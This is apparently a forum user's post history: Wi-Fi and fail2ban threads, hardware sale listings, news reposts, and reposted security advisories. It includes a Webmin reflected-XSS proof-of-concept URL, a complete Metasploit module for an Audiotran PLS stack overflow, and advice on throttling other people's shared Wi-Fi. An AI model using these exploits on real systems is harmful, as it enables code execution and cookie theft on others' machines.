Jump to content

kp112

Active Members
  • Posts

    114
  • Joined

  • Last visited

Posts posted by kp112

  1. esti praf 2 stai jos !

    ce a intrebat omu ?

    Am si eu o mica mare problema,am internet prin wifi,la care suntem conectati cam 6,7 utilizatori,telefoane,laptopuri etc. Sunt curios daca exista vreun soft,metoda ca eu sa am cel mai puternic semnal din toti cei care folosesc internetul.

    raspunsu meu !

    "Channel type" in loc de auto pune o valoare mai mare in cazu meu am pus 13 si la ceilalti care sunt conectati limiteaza viteza

    Logica !

    Marirea frecventei = mareste puterea de semnal

    Limitarea bandei = pentru toti ceilalti care sunt conectati la wi-fi

  2. Anonymous Declares War on Lizard Squad Hacker Team Who Took Down Playstation & Xbox Networks On Christmas

    anonymous-vs-lizard-squad-650x250.jpg

    As you may have heard the hacker group “Lizard Squad” has claimed responsibility for the hack of Sony and PlayStation’s online gaming services that shut down on Christmas Day and were still down until some minutes ago from writing this article (12:40 p.m CST)

    The gaming networks returned thanks to Megaupload founder Kim Dotcom, who offered the Lizard Squad 3,000 premium lifetime vouchers for his relaunched MegaPrivacy service.

    Kim Dotcom is wanted by the U.S. government for copyright infringement related to his former file-sharing website Megashare which has been taken by the US Government. He took the time to take a dig at the United States with his example of diplomatic outreach:

    Anonymous vs Lizard Squad

    There have been several fake and alleged “anonymous” videos and claims about a declared war against Lizard Squad. The most popular video was an alleged anonymous video claiming that anonymous would work together with government, police and FBI to take down lizard squad, which anonymous later confirmed that it was fake. Here are the two real videos, where anonymous declares war against the infamous Lizard Squad:

    Anonymous vs Lizard Squad

    Greetings citizens of The World, Lizard Squad is just another joke, they could barely perform an 10GBs DDoS attack. Whoever is the owner of the channel that uploaded the video "Anonymous vs Lizard Squad" is either some random troll or someone that has no idea what Anonymous is fighting for, in that video is mentioned that: "Anonymous is going to side up with the FBI's in order to catch them". Anonymous is in underground war with the government and the organizations like FBI, destroying gaming community is just one of the Another Ways of weakening them. Why would we support the governmental agency "FBI"?

    Anonymous vs Lizard Squad - 2nd Message

    Greetings Gaming Community & Lizard Squad aka Finest, It has come to our attention that despite our continued warnings you have decided to disregard our requests to stop promoting propaganda such as "Anonymous has joined up with the FBI". The only Anon that ever worked with the FBI is Sabu, the former Lulzsec's leader and now he's know as the biggest traitor and scumbag that shopped hes friends to the police in order to save himself among all Anonymous parties. The Leader of Lizard Squad Jord is also the leader of Finest Squad which is in the same position as Sabu (shopped two of hes friends to the police after hacked by Anonymous and, now is struggling to escape from us). Everything that's happening right now such as "Interview" is a typical brainwashing method of drama in order to save himself. You have made an enemy of Anonymous by saying that we are supporting FBI and now you are all going down!

    Source : Anonymous Declares War on Lizard Squad

  3. Acesta este un expansion pack si necesita jocul de baza Diablo 3 PC pentru a putea fi instalat si jucat. "Moartea, in cele din urma, isi va intinde aripile peste tot..." Infrangerea lui Diablo, stapanul terorii, ar fi trebuit sa aduca o era a sperantei, in schimb, a adus o putere intunecata, a carei scop malefic urmeaza sa fie dezvaluit. Diablo III: Reaper of Souls, expansion-ul Diablo III, prezinta un nou capitol intunecat si terifiant, in conflictul ce se desfasoara pe taramul Sanctuary.

    2regjuo.jpg

    ixrtyt.jpg

    Stoc Disponibil 5 Bucati

    Produs SIGILAT !

    Bucuresti/Sector 3

    Modalitate Contact: PM

    Pret: 100 RON

  4. Webmin version 1.670 suffers from a cross site scripting vulnerability.

    . I. VULNERABILITY

    -------------------------

    Reflected XSS Attacks XSS vulnerabilities in Webmin 1.670

    II. BACKGROUND

    -------------------------

    Webmin is a web-based interface for system administration for Unix.
    Using any modern web browser, you can setup user accounts, Apache,
    DNS, file sharing and much more. Webmin removes the need to manually
    edit Unix configuration files like /etc/passwd, and lets you manage a
    system from the console or remotely. See the standard modules page for
    a list of all the functions built into Webmin, or check out the
    screenshots.




    III. DESCRIPTION

    -------------------------

    Has been detected a Reflected XSS vulnerability in Webmin 1.670 in
    page of log, that allows the execution of arbitrary HTML/script code
    to be executed in the context of the victim user's browser.
    The code injection is done through the parameter "search" in page
    https://IP:10000/webminlog/view.cgi?id=1&search=



    IV. PROOF OF CONCEPT

    -------------------------

    https://192.168.49.132:10000/webminlog/view.cgi?id=1&search=e"><script>alert(document.cookie);</script>



    V. BUSINESS IMPACT

    -------------------------

    An attacker can execute arbitrary HTML or script code in a targeted

    user's browser, this can leverage to steal sensitive information as
    user credentials, personal data, etc.





    VI. SYSTEMS AFFECTED

    -------------------------



    Webmin version 1.670 install in Debian





    VII. SOLUTION

    -------------------------

    All data received by the application and can be modified by the user,

    before making any kind of transaction with them must be validated.

    VIII. References
    -------------------------
    http://www.kb.cert.org/vuls/id/381692
    http://www.webmin.com/changes.html

    Sursa: Webmin 1.670 Cross Site Scripting ? Packet Storm

    • Upvote 1
  5. Diverse Componente Laptop

    Intel Mobile Core 2 Duo T7500 2,2Ghz s479 - 200 RON

    v7l0.jpg

    lo5h.jpg

    Samsung 4gb 2rx8 pc2-5300s-555-12-e3 - 150 RON

    mr6q.jpg

    Sony Optiarc AD-7560A 8x DVD±RW Notebook(Black) -150 RON

    sa78.jpg

    yh5s.jpg

    7x97.jpg

    Intel Wireless WiFi Link 4965AGN MM2 PCI Express Mini Card - 50 RON

    vepp.jpg

    09nj.jpg

    AC Adapter ADP-90SB AB - 70 RON

    lxm5.jpg

    Baterie laptop Acer AS07B31 - 180 RON

    7x14.jpg

    Pentru orice nelamurire sau informatie lasati un PM !

    PRET 700 RON TOATE / Separat aveti Pretu afisat mai sus.

    Modalitate Contact : PM

  6. [ ok ] Restarting authentication failure monitor: fail2ban.

    fail2ban eroare :(

    am editat

    /etc/fail2ban/jail.local

    filter = pureftpd
    on
    filter = pure-ftpd

    si tot degeaba, am incercat si asta

    editat si /etc/fail2ban/filter.d/sasl.conf


    failregex = (?i): warning: [-._\w]+\[<HOST>\]: SASL (?:LOGIN|PLAIN|(?:CRAM|DIGEST)-MD5) authentication failed

    Editare /etc/fail2ban/jail.local:


    [sasl]
    ..
    logpath = /var/log/mail.warn

    si degeaba :(

  7. uite cum trag cu munitie de razboi jegosi futule morti in gat

    http://www.radiosvoboda.org/media/video/25270710.html

    Mesaj !

    Sunt ucraineanc?, nativ? din Kiev. ?i acum sunt pe Maidan, în partea central? a ora?ului meu. Vreau s? ?ti?i de ce mii de oameni din întreaga mea ?ar? sunt pe str?zi. Exist? un singur motiv: vor s? se elibereze din strânsoarea dictaturii, vor s? scape de politicienii care lucreaz? numai pentru ei, care sunt preg?ti?i s? trag?, s? bat?, s? r?neasc? oamenii doar ca s? î?i salveze banii, doar ca s? î?i salveze casele, doar ca s? î?i salveze puterea.

    Vreau ca oamenii care sunt aici, care au demnitate, care sunt curajo?i, s? tr?iasc? o via?? normal?. Suntem oameni civiliza?i, dar guvernan?ii no?tri sunt barbari. Aceasta nu este Uniunea Sovietic?, vrem ca justi?ia noastr? s? nu fie corupt?, vrem s? fim liberi. ?tiu c? poate mâine nu vom mai avea telefon, nu vom mai avea conexiune la internet ?i vom fi singuri aici. ?i poate poli?i?tii ne vor ucide unul câte unul, când se va l?sa întunericul aici.

    De aceea v? rog acum s? ne ajuta?i. Avem aceast? libertate în inimile noastre, avem aceast? libertate în min?ile noastre, iar acum v? rog s? ne ajuta?i s? construim aceast? libertate în ?ara noastr?. Ne pute?i ajuta fie doar spunând povestea aceasta prietenilor vo?tri, fie doar împ?rt??ind acest videoclip. V? rog, r?spândi?i-l. Vorbi?i cu prietenii vo?tri, vorbi?i cu familia voastr?, vorbi?i cu guvernul vostru, ar?ta?i c? ne sprijini?i.

    V? rug?m s? lua?i leg?tura cu cei care v? reprezint? ?i s? le cere?i s? sprijine poporul ucrainean în lupta sa pentru libertate ?i democra?ie. Înainte s? fie prea târziu.

  8. salut!

    am un iMAC G5 17" si iam crapat dipaly-ul

    cam cat ar costa sa il schimb??

    puteti sa imi trimiteti si cateva linkuri daca se poate

    va multumesc!

    invata in pula mea romaneste si dupa aia posteaza

    " iam crapat dipaly-ul " = mi-am spart display-ul

    " puteti sa imi trimiteti si cateva linkuri daca se poate " = puteti sa-mi trimiteti si cateva linkuri daca se poate

    //Nu m-am putut abtine !

  9. Drupal Slickgrid third party module version 7.x suffers from an access bypass vulnerability.

    View online: https://drupal.org/node/2200491

    * Advisory ID: DRUPAL-SA-CONTRIB-2014-22

    * Project: Slickgrid [1] (third-party module)

    * Version: 7.x

    * Date: 2014-February -22

    * Security risk: Moderately critical [2]

    * Exploitable from: Remote

    * Vulnerability: Access bypass

    -------- DESCRIPTION

    ---------------------------------------------------------

    The Slickgrid module is an implementation of the jQuery slickgrid plugin, a

    lightening fast JavaScript grid/spreadsheet. It defines a slickgrid view

    style, so all data can be output as an editable grid.

    The module doesn't check access sufficiently, allowing users to edit and

    change field values of nodes they should not have access to change.

    -------- CVE IDENTIFIER(S) ISSUED

    --------------------------------------------

    * /A CVE identifier [3] will be requested, and added upon issuance, in

    accordance with Drupal Security Team processes./

    -------- VERSIONS AFFECTED

    ---------------------------------------------------

    * Slickgrid 7.x-1.x versions

    Drupal core is not affected. If you do not use the contributed Slickgrid [4]

    module, there is nothing you need to do.

    -------- SOLUTION

    ------------------------------------------------------------

    Install the latest version:

    * If you use the Slickgrid module for Drupal 7.x, upgrade to Slickgrid

    7.x-2.0 [5]

    Also see the Slickgrid [6] project page.

    -------- REPORTED BY

    ---------------------------------------------------------

    * Tim Wood [7]

    -------- FIXED BY

    ------------------------------------------------------------

    * Ben Scott [8]

    * Simon Rycroft [9] the module maintainer

    -------- COORDINATED BY

    ------------------------------------------------------

    * Greg Knaddison [10] of the Drupal Security Team

    * Michael Hess [11] of the Drupal Security Team

    -------- CONTACT AND MORE INFORMATION

    ----------------------------------------

    The Drupal security team can be reached at security at drupal.org or via the

    contact form at http://drupal.org/contact [12].

    Learn more about the Drupal Security team and their policies [13], writing

    secure code for Drupal [14], and securing your site [15].

    Follow the Drupal Security Team on Twitter at

    https://twitter.com/drupalsecurity [16]

    [1] http://drupal.org/project/slickgrid

    [2] http://drupal.org/security-team/risk-levels

    [3] http://cve.mitre.org/

    [4] http://drupal.org/project/slickgrid

    [5] https://drupal.org/node/2200475

    [6] http://drupal.org/project/slickgrid

    [7] http://drupal.org/user/23373

    [8] http://drupal.org/user/149339

    [9] http://drupal.org/user/151544

    [10] https://drupal.org/user/36762

    [11] https://drupal.org/user/102818/

    [12] http://drupal.org/contact

    [13] http://drupal.org/security-team

    [14] http://drupal.org/writing-secure-code

    [15] http://drupal.org/security/secure-configuration

    [16] https://twitter.com/drupalsecurity

  10. Drupal Maestro third party module version 7.x suffers from a cross site scripting vulnerability.

    View online: https://drupal.org/node/2200453

    * Advisory ID: DRUPAL-SA-CONTRIB-2014-021

    * Project: Maestro [1] (third-party module)

    * Version: 7.x

    * Date: 2014-February-19

    * Security risk: Less critical [2]

    * Exploitable from: Remote

    * Vulnerability: Cross Site Scripting

    -------- DESCRIPTION

    ---------------------------------------------------------

    The Maestro module enables you to create complex workflows, automating

    business processes.

    The module doesn't sufficiently filter Role or Organic Group names when

    displaying them in the workflow details.

    This vulnerability is mitigated by the fact that an attacker must have a role

    with the permission to create Drupal Roles or Organic Groups.

    -------- CVE IDENTIFIER(S) ISSUED

    --------------------------------------------

    * /A CVE identifier [3] will be requested, and added upon issuance, in

    accordance with Drupal Security Team processes./

    -------- VERSIONS AFFECTED

    ---------------------------------------------------

    * Maestro 7.x-1.x versions prior to 7.x-1.4.

    Drupal core is not affected. If you do not use the contributed Maestro [4]

    module, there is nothing you need to do.

    -------- SOLUTION

    ------------------------------------------------------------

    Install the latest version:

    * If you use the Maestro module for Drupal 7.x, upgrade to Maestro 7.x-1.4

    [5]

    Also see the Maestro [6] project page.

    -------- REPORTED BY

    ---------------------------------------------------------

    * Aron Novak [7]

    -------- FIXED BY

    ------------------------------------------------------------

    * Aron Novak [8], the reporter

    * Randy Kolenko [9] the module maintainer

    -------- COORDINATED BY

    ------------------------------------------------------

    * Greg Knaddison [10] of the Drupal Security Team

    * Michael Hess [11] of the Drupal Security Team

    -------- CONTACT AND MORE INFORMATION

    ----------------------------------------

    The Drupal security team can be reached at security at drupal.org or via the

    contact form at http://drupal.org/contact [12].

    Learn more about the Drupal Security team and their policies [13], writing

    secure code for Drupal [14], and securing your site [15].

    Follow the Drupal Security Team on Twitter at

    https://twitter.com/drupalsecurity [16]

    [1] http://drupal.org/project/maestro

    [2] http://drupal.org/security-team/risk-levels

    [3] http://cve.mitre.org/

    [4] http://drupal.org/project/maestro

    [5] https://drupal.org/node/2013653

    [6] http://drupal.org/project/maestro

    [7] http://drupal.org/user/61864

    [8] http://drupal.org/user/61864

    [9] http://drupal.org/user/704970

    [10] https://drupal.org/user/36762

    [11] https://drupal.org/user/102818/

    [12] http://drupal.org/contact

    [13] http://drupal.org/security-team

    [14] http://drupal.org/writing-secure-code

    [15] http://drupal.org/security/secure-configuration

    [16] https://twitter.com/drupalsecurity

  11. This Metasploit module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.

    ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Audiotran PLS File Stack Buffer Overflow',
    'Description' => %q{
    This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
    An attacker must send the file to victim and the victim must open the file.
    Alternatively, it may be possible to execute code remotely via an embedded
    PLS file within a browser when the PLS extention is registered to Audiotran.
    This alternate vector has not been tested and cannot be exercised directly
    with this module.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Philip OKeefe',
    ],
    'References' =>
    [
    [ 'EDB', '14961' ]
    ],
    'Payload' =>
    {
    'Space' => 5000,
    'BadChars' => "\x00\x0a\x0d\x3d",
    'StackAdjustment' => -3500,
    },
    'Platform' => 'win',
    'Targets' =>
    [
    [ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx
    ],
    'Privileged' => false,
    'DisclosureDate' => 'Sep 09 2010',
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
    ], self.class)
    end

    def exploit
    sploit = "[playlist]\r\nFile1="
    sploit << rand_text_alpha_upper(1940)
    sploit << generate_seh_payload(target.ret)
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
    end
    end

×
×
  • Create New...